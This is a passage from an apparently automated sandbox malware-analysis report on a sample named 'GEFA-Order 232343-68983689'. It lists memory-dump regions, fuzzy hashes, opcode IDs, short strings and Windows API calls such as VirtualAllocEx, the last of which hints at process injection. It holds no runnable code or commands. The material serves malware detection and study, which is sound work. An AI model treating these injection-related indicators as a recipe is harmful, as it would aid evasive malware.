                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: d3421f3d2132766c2ffc977e32deedd485f87141ab0d54e15f79d726641b6316
                                                              • Instruction ID: 9167070bd6b9c0dc57fa79e7327f4b3daa858be9eccb8fd3da9bb5485d67396c
                                                              • Opcode Fuzzy Hash: d3421f3d2132766c2ffc977e32deedd485f87141ab0d54e15f79d726641b6316
                                                              • Instruction Fuzzy Hash: 172136B1806388CFDB10CF59C4047EEBFF4EB16314F088099D998A7A82D37D5A04CB65
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F18176
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: aa7e3ea2f668ed30b75b0e9ac19f5115b8c46f1234193fb6d1323c6b598d90b8
                                                              • Instruction ID: 4215e8cddfc3a40918230bdebb06a2d0e330c5ac3b3a0d98a2feabbac1716a36
                                                              • Opcode Fuzzy Hash: aa7e3ea2f668ed30b75b0e9ac19f5115b8c46f1234193fb6d1323c6b598d90b8
                                                              • Instruction Fuzzy Hash: A01137728003499FDF10DFAAC845BDEBBF5EF49310F148819E529A7250C7759954CFA1
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 030B949D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1389579730.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_30b0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: ad5da7fcaf9017d032a26b50aa5be54276c023276871bffa7981960b014884a4
                                                              • Instruction ID: d7700346607e54b821b9f0d1ea532f9ee4053368ce199439a2e52c71e20bf612
                                                              • Opcode Fuzzy Hash: ad5da7fcaf9017d032a26b50aa5be54276c023276871bffa7981960b014884a4
                                                              • Instruction Fuzzy Hash: C111BFB5802389CFDB10DF96D4047EEBFF4EB09314F148499D998AB681D3795604CBA5
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 030BAB7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1389579730.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_30b0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: e119b2f7ee2ac9bca1fb64d2c600ad33b58f6d43b439e3c2fc0db942a423991f
                                                              • Instruction ID: 3ee39be3293dfbc1c69a630866c489511f85ead6e835f64dd9a8dc482a15ba10
                                                              • Opcode Fuzzy Hash: e119b2f7ee2ac9bca1fb64d2c600ad33b58f6d43b439e3c2fc0db942a423991f
                                                              • Instruction Fuzzy Hash: 35111DB6D003498FDB10CF9AC444BDEFBF9EB88224F14842AD828A7240C379A545CFA5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !
                                                              • API String ID: 0-2657877971
                                                              • Opcode ID: 8a4d6263a601eba2bfa8ec0a25f51380a0b6cc56a32579d8e5948dedb7dfa6c7
                                                              • Instruction ID: 977922342f1407f07b9fec089ff1ef0aafafe6533734191e743e376451e26630
                                                              • Opcode Fuzzy Hash: 8a4d6263a601eba2bfa8ec0a25f51380a0b6cc56a32579d8e5948dedb7dfa6c7
                                                              • Instruction Fuzzy Hash: 0D710370A46218CFDBA4DF58D858BA9B7B2FF49300F1080E9D509A72A1DB719E84CF41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: F
                                                              • API String ID: 0-1304234792
                                                              • Opcode ID: 599776f96600bc04dae64c418034b1b21cd678dcfce5785ac6e3ce2c6bc1a266
                                                              • Instruction ID: c152ed5bfe39c0ababa134e5f7b0da25d513e9ec595bdb65cb048ad2d951bc7b
                                                              • Opcode Fuzzy Hash: 599776f96600bc04dae64c418034b1b21cd678dcfce5785ac6e3ce2c6bc1a266
                                                              • Instruction Fuzzy Hash: E921AC74905268DFDBA0DF64D944BDCBBB2AB09300F0081EAD60DA7251CB305E848F40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %
                                                              • API String ID: 0-2567322570
                                                              • Opcode ID: 65954fc1cc98740592eaab7a8f3acd592399afa7441dbc4cce3439834cd01925
                                                              • Instruction ID: 9fd71352a8af62f7440a05d7f91714456fbaeb87f4c2223a6af2fd7b433069d6
                                                              • Opcode Fuzzy Hash: 65954fc1cc98740592eaab7a8f3acd592399afa7441dbc4cce3439834cd01925
                                                              • Instruction Fuzzy Hash: 33218B74901268CFDBA0CF68DD48BD9BBB2AF49305F1481DADA09A7361C7729E85CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410817108.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: t
                                                              • API String ID: 0-2238339752
                                                              • Opcode ID: 821e44af4904c0107f3f70d0f67344a2b3b15e9dc47c962df16d1aa6c6e688ff
                                                              • Instruction ID: 0ed14a64333ace9ccff1ed3411bf36a3cad13ce52c08e64a1b6d281ac872c8c3
                                                              • Opcode Fuzzy Hash: 821e44af4904c0107f3f70d0f67344a2b3b15e9dc47c962df16d1aa6c6e688ff
                                                              • Instruction Fuzzy Hash: B31126B492422ACFEB34DF18D888BA9B3B6BB85304F1052E5D45DA3640DB754E85CF11
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,
                                                              • API String ID: 0-3772416878
                                                              • Opcode ID: 060ae8a7dc780f6a2e4be324482c6f648e2aed2b2f33f829bfaabbdc7251bc00
                                                              • Instruction ID: 4ec742b1c87bc2b430514a9c179ebde6c2cdb848e344113d4ec530ab035ec830
                                                              • Opcode Fuzzy Hash: 060ae8a7dc780f6a2e4be324482c6f648e2aed2b2f33f829bfaabbdc7251bc00
                                                              • Instruction Fuzzy Hash: B011EE70901218CFEBA0DF18D9A4B9CB7B5BF09300F4082DAD509A72A1CB759E85CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 9
                                                              • API String ID: 0-2366072709
                                                              • Opcode ID: 32a30b297515140304fad6e1488b559a5a9810bb1250a28fca7fcc8785bbca3c
                                                              • Instruction ID: 35b985b17ec6f3f8743f6ea096f7ee796093c3ce0df584b1a19ff3a2179332e3
                                                              • Opcode Fuzzy Hash: 32a30b297515140304fad6e1488b559a5a9810bb1250a28fca7fcc8785bbca3c
                                                              • Instruction Fuzzy Hash: 3011CCB4A501188FCB64DF24C89479EBBF1EF4A311F4081EAD54AA7350DB305E80CF06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: >
                                                              • API String ID: 0-325317158
                                                              • Opcode ID: 0f108d269ca3648920d5ead14f38a12092d419b2d82d9eeed363523b6477c92f
                                                              • Instruction ID: df24151af64ed60de470be80e62f9cdb9d04bf6c5640a738b1fdea57d4bfc6db
                                                              • Opcode Fuzzy Hash: 0f108d269ca3648920d5ead14f38a12092d419b2d82d9eeed363523b6477c92f
                                                              • Instruction Fuzzy Hash: B4F07A74A012289FDBA1CF98D884B9CBBB1AB49300F104099A50DAB3A0C7716E81CF80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: >
                                                              • API String ID: 0-325317158
                                                              • Opcode ID: b1d41b5d52ac47fbd49278b137525cb9e06b57281aa8991fb5ae7964e87885d9
                                                              • Instruction ID: df24151af64ed60de470be80e62f9cdb9d04bf6c5640a738b1fdea57d4bfc6db
                                                              • Opcode Fuzzy Hash: b1d41b5d52ac47fbd49278b137525cb9e06b57281aa8991fb5ae7964e87885d9
                                                              • Instruction Fuzzy Hash: B4F07A74A012289FDBA1CF98D884B9CBBB1AB49300F104099A50DAB3A0C7716E81CF80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: L
                                                              • API String ID: 0-2909332022
                                                              • Opcode ID: 359bb5f639f9a47e3616fffc36326efef13f1600a565e43bb9dc984e6e8de364
                                                              • Instruction ID: a68990b9d1779ca8da5744bb8e2d40b40935af25f130174a2546541a3c9bfb95
                                                              • Opcode Fuzzy Hash: 359bb5f639f9a47e3616fffc36326efef13f1600a565e43bb9dc984e6e8de364
                                                              • Instruction Fuzzy Hash: 5FF0FAB8D152288FCB68CF25D9857D9BBB1BB98301F1081EAD549A3250DBB01EC0DF41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6
                                                              • API String ID: 0-498629140
                                                              • Opcode ID: 1ce61eab976390a3b48265da4725ca535acbef3c4a50c4a0fc5eb6842ed388c9
                                                              • Instruction ID: f396e084d7c30e046aa19110f822259593335e97ff9414252b6b4671f7de0c2f
                                                              • Opcode Fuzzy Hash: 1ce61eab976390a3b48265da4725ca535acbef3c4a50c4a0fc5eb6842ed388c9
                                                              • Instruction Fuzzy Hash: 7BE0BD398062288FEB20CF20DA48BD8BBF1AF08304F0040DA8209A22A1C6345E85CF00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m
                                                              • API String ID: 0-3775001192
                                                              • Opcode ID: a084c79ec50fd44ed3a2a918e48093ca29badf781cb4db9492359e6c233604cb
                                                              • Instruction ID: a9fe5bb19daafd1e9ae30183916a5c2ccf616acda824782d5729f1545a00ea21
                                                              • Opcode Fuzzy Hash: a084c79ec50fd44ed3a2a918e48093ca29badf781cb4db9492359e6c233604cb
                                                              • Instruction Fuzzy Hash: 5FD05EB5A10328CFDB10DF64D44874A37B3FB84308F000284C209A7200CB344D948F5A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c484a951d638daf6b2cb6e42f95620ddeb29e47d9e7ff7e7b6171c195dc78a3
                                                              • Instruction ID: d19e6bd1f4869c4dfc02f0c51530abe177bf809aa20a5b114d764b70d438e246
                                                              • Opcode Fuzzy Hash: 3c484a951d638daf6b2cb6e42f95620ddeb29e47d9e7ff7e7b6171c195dc78a3
                                                              • Instruction Fuzzy Hash: AB52D675E002288FDB64DF68C985BEDBBF6BB88300F1581D9E549A7351DA309E81CF61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409450802.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d60000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 60219f21bbbcc3df7e8e6c35f27796e9b80f6877475d031be74dc137c7aa3eda
                                                              • Instruction ID: ba93417de167489b96102aebe9b4e45d8750d1556424349d98b9643115eb88ae
                                                              • Opcode Fuzzy Hash: 60219f21bbbcc3df7e8e6c35f27796e9b80f6877475d031be74dc137c7aa3eda
                                                              • Instruction Fuzzy Hash: C242F674E0421DCFDB94CFAAD854AAEB7B2FF49300F108019E916AB394D7749982CF91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cefaef2fafa34263e68bb524dd1edc40cac10ce550f13da0ecaa3ed85cf43090
                                                              • Instruction ID: 23b36a594f2fca95c67c9b53eece60f8257d391e2ae14c11abf6c19a9743fe7f
                                                              • Opcode Fuzzy Hash: cefaef2fafa34263e68bb524dd1edc40cac10ce550f13da0ecaa3ed85cf43090
                                                              • Instruction Fuzzy Hash: 50120335700605CFDB54EF28D894AAA77B2EF89714B2580A8E9069B3A1DB35EC41CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0fdebee66971d13913cd34120ffcfe1f363994f54e50f7e42e61a105f0afbf12
                                                              • Instruction ID: cd57d46544979d7f27b46852315dc1beef1e21c8e889c74bfd6769e620552080
                                                              • Opcode Fuzzy Hash: 0fdebee66971d13913cd34120ffcfe1f363994f54e50f7e42e61a105f0afbf12
                                                              • Instruction Fuzzy Hash: 40225E71E0022A8FDB55DFA5D854AAEBBF2FF48300F248115E812AB395DB749D81CF91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409450802.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d60000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b09426cf09c7e85cb4d9340b8af01eaddaaa25ff51c67e525d5c813af8d6fb5
                                                              • Instruction ID: 534676e7c968d34bd13e9b23f3e6b38a3116cb8744d9ffe2a463356e33725b28
                                                              • Opcode Fuzzy Hash: 7b09426cf09c7e85cb4d9340b8af01eaddaaa25ff51c67e525d5c813af8d6fb5
                                                              • Instruction Fuzzy Hash: F922C230D01258CFCF94DFA5C9546ADB7B2BF89301F208469E85AAB394DB359E89CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49869db82b00f4d04ac14391b4f84a717985a930dd421c5e484a727c8322cbb1
                                                              • Instruction ID: 5d9992ceae728359d6e7a11127b6dc27f7b9d373b6496fd5833b10b70a9107cb
                                                              • Opcode Fuzzy Hash: 49869db82b00f4d04ac14391b4f84a717985a930dd421c5e484a727c8322cbb1
                                                              • Instruction Fuzzy Hash: 70126D31A00215CFDBA4DFA9D844A6EB7F6FF88300F14852AD50A9B794DB35EC45CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0786d7fe55a5719a17393bad2d829fb4f702b14a3df83eee9924b97c08e2765c
                                                              • Instruction ID: 6879becf76384d657ee619e73b6d6e7f351c2a1887e348dda8d5b9e90e15648b
                                                              • Opcode Fuzzy Hash: 0786d7fe55a5719a17393bad2d829fb4f702b14a3df83eee9924b97c08e2765c
                                                              • Instruction Fuzzy Hash: 25120934A002298FDB94EF64CD94A9DB7B2BF89300F5185A8D54AAB395DF70ED85CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4d81d8f75415c8c1bf374afc7873e140adb579026415daff5d018f3ad10ef6f
                                                              • Instruction ID: a309565127b651a3b24ee47497d6804fcb61f0470d78648c77548122d91d426a
                                                              • Opcode Fuzzy Hash: a4d81d8f75415c8c1bf374afc7873e140adb579026415daff5d018f3ad10ef6f
                                                              • Instruction Fuzzy Hash: ABF16534A00219DFDB45EF64D89499DBBB2FF89300F108569E806AB3A4DF74ED45CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f42f642eafae0edcdaaa4e32b9fece5319c00625103c2f9dd6092aec00778e9c
                                                              • Instruction ID: 39f59e6ebfca756dc35115230958f6c9b448a9a868c0b1181e395376aa37c764
                                                              • Opcode Fuzzy Hash: f42f642eafae0edcdaaa4e32b9fece5319c00625103c2f9dd6092aec00778e9c
                                                              • Instruction Fuzzy Hash: 9FF1D934B00218CFDB44EFA4D998A9DB7B2FF89301F158159E906AB3A5DB71EC42CB41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409450802.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d60000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 57441595b2f3c661db31266590a99eba0fb149cbafe2a3781e51405753e9f2f5
                                                              • Instruction ID: 7d93841f5e0da46dded0ccfd6e02fbc4f5807fac9c70f8188aaeb5ebdd40944d
                                                              • Opcode Fuzzy Hash: 57441595b2f3c661db31266590a99eba0fb149cbafe2a3781e51405753e9f2f5
                                                              • Instruction Fuzzy Hash: CFF1E734D01218DFCB98EFA9E9946ACBBB2FF49305F20452EE416A7394DB315A85CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54f6fa4ea16aa48d77b638744d24ad72c18994a7d3d192410b74b6ac889f0358
                                                              • Instruction ID: 3f85ec2377ea612ee20ff325feeb1e2b05b18504ff547a0d3d720632ff05689b
                                                              • Opcode Fuzzy Hash: 54f6fa4ea16aa48d77b638744d24ad72c18994a7d3d192410b74b6ac889f0358
                                                              • Instruction Fuzzy Hash: 20C1C231F047608FDBA58B28C45466ABBE2BF85310B19896DD48BCB791EBF4EC81C751
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e07d6bc5265b3d26e8b667b2c54ca135a5f8fecea11a230b886fba00f5fc8e36
                                                              • Instruction ID: bfb37b0036a2c0f7ef75d33a944cf728b61dacbd798f237a0134b0a669aad898
                                                              • Opcode Fuzzy Hash: e07d6bc5265b3d26e8b667b2c54ca135a5f8fecea11a230b886fba00f5fc8e36
                                                              • Instruction Fuzzy Hash: 70A1D131B04210DFD7559F68D854A2A7BF3EF89300B1580A9E646CF3A2DB36DC42CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409450802.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d60000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 56f1e941badc9ac63d35124a26509c4c9c260cde4ede6f84411af47fc7bb27e9
                                                              • Instruction ID: 6b2d544458e5229c518f883a793782180a4384749e0c5ebc36f64e5467625589
                                                              • Opcode Fuzzy Hash: 56f1e941badc9ac63d35124a26509c4c9c260cde4ede6f84411af47fc7bb27e9
                                                              • Instruction Fuzzy Hash: 84C1D935E01219CFDB54DFAAD894AEDB7B2FF89301F108029E416AB394D7749A42CF91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd25e32344ac821f74f5222cb7b30ce04d2826eaeeafa8738099b939636c6474
                                                              • Instruction ID: 37ace21ac7763a3e5616c3896da601f5af79ca5e5e4b298e042b593a474d7517
                                                              • Opcode Fuzzy Hash: cd25e32344ac821f74f5222cb7b30ce04d2826eaeeafa8738099b939636c6474
                                                              • Instruction Fuzzy Hash: 8EB1E574E00218CFEB54DFA8E884BADB7F2EF49304F1081AAD509AB291CB745E85CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 392e9cedb40163461236c910169dc9f61a1e770d3ccad211a5475f64d9c87655
                                                              • Instruction ID: 4551b56f0828be7bf5d7b56194e444c06fbd6bd5e9c033bbc5620d84fd01dd54
                                                              • Opcode Fuzzy Hash: 392e9cedb40163461236c910169dc9f61a1e770d3ccad211a5475f64d9c87655
                                                              • Instruction Fuzzy Hash: ACB1DF74E01218CFDBA4DF68E884B9EB7F2BF99304F1091A9D519A7261DB305E81CF81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1ee2ff07e1e97418432dc79ede498f493c311006c8303813cca795ba618208f8
                                                              • Instruction ID: c5c83dc0d82b19fe5e9201b145b0ac8b515e2ffac641a49902326395f8eb892f
                                                              • Opcode Fuzzy Hash: 1ee2ff07e1e97418432dc79ede498f493c311006c8303813cca795ba618208f8
                                                              • Instruction Fuzzy Hash: 71A10934A002288FDB54DF64C994B9DBBB2BF89300F5585A8D54AAB3A5DF70ED85CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8338edf52c346c8ae91f79f71bccf4de1cfd8b2906206cf76b56694637d81f83
                                                              • Instruction ID: ffb4c66aff471969a34e63cf510db30b6388bc5050b28213d986081bc7b6e8e4
                                                              • Opcode Fuzzy Hash: 8338edf52c346c8ae91f79f71bccf4de1cfd8b2906206cf76b56694637d81f83
                                                              • Instruction Fuzzy Hash: 49A1FD34A10218DFCB44EFA4D89899DB7B2FF89301F158169E506AB3A5DB70EC46CF91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7663e983304c61e11dd8ba3fbfb2593576762f61fa0cd44c9b92e8b865282745
                                                              • Instruction ID: a07832dbb29f1e694537ada774a83efda57f5f797ae12584463608f775f6e6af
                                                              • Opcode Fuzzy Hash: 7663e983304c61e11dd8ba3fbfb2593576762f61fa0cd44c9b92e8b865282745
                                                              • Instruction Fuzzy Hash: 86818935B0121A8FCB05CFA8E898AADBBF2EF89315F144469E901AB390DB35CD41CF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e9fe1efe5c2a362a4481d0feb724dc6544f16b0ffa01b66660069c569f921a5
                                                              • Instruction ID: 431d07ef567407cd55615bab881266ee7ad0770a44f0c3820f5ab21788be0bbf
                                                              • Opcode Fuzzy Hash: 5e9fe1efe5c2a362a4481d0feb724dc6544f16b0ffa01b66660069c569f921a5
                                                              • Instruction Fuzzy Hash: A7813A34B10224DFCB84EF68D894A6DBBB6BF89700F144069E906DB3A5DB74EC41CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
